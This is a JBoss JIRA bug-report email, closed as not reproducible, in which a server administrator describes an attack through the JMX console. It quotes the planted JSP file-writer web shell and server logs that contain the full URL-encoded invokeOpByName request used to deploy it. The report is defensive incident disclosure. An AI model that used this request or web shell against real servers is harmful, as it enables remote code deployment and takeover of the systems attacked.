[jboss-jira] [JBoss JIRA] (JBAS-9535) Exploit found in JBoss JMX Console via HtmlAdaptor?action=invokeOpByName
Arun Neelicattu (JIRA)
jira-events at lists.jboss.org
Thu Sep 19 22:35:03 EDT 2013
[ https://issues.jboss.org/browse/JBAS-9535?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Arun Neelicattu closed JBAS-9535.
---------------------------------
Resolution: Cannot Reproduce Bug
Closing this bug as it cannot be reproduced and there was no response from the reporter.
> Exploit found in JBoss JMX Console via HtmlAdaptor?action=invokeOpByName
> ------------------------------------------------------------------------
>
> Key: JBAS-9535
> URL: https://issues.jboss.org/browse/JBAS-9535
> Project: Application Server 3 4 5 and 6
> Issue Type: Bug
> Security Level: Public(Everyone can see)
> Components: JMX
> Affects Versions: JBossAS-5.1.0.GA
> Environment: CentOS 5.4
> Reporter: Mike Hansen
>
> I noticed a new deployment called myname.war with index.jsp which had the following inside:
> <%
> if(request.getParameter("f")!=null)
> (new java.io.FileOutputStream(application.getRealPath("\\") + request.getParameter("f"))).write(request.getParameter("t").getBytes()
> );
> %>
> mynameok
> I looked into my web server logs and found the following entry:
> ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 -
> I double-checked our server and we had implemented the fixes for CVE-2010-0738. (We've seen attempts by the JBoss worm trying to install the kisses.tar.gz exploit, but they've been unsuccessful so far.)
> Here is the complete log of the exploit as recorded by the webserver:
> access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:27 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /web-console/dtree.js HTTP/1.0" 302 - "http://153.90.162.14/web-console/dtree.js" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /jmx-console/jboss.css HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/jboss.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:30 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:32 -0600] "GET /invoker/JMXInvokerServlet HTTP/1.0" 200 3365 "http://153.90.162.14/invoker/JMXInvokerServlet" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:04 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 302 - "-" "-"
> access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:14 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:15 -0600] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 73 "-" "Java/1.6.0_10-rc2"
> access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:17 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 -
> ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 10.101.48.70 TLSv1 RC4-MD5 "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" -
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
More information about the jboss-jira
mailing list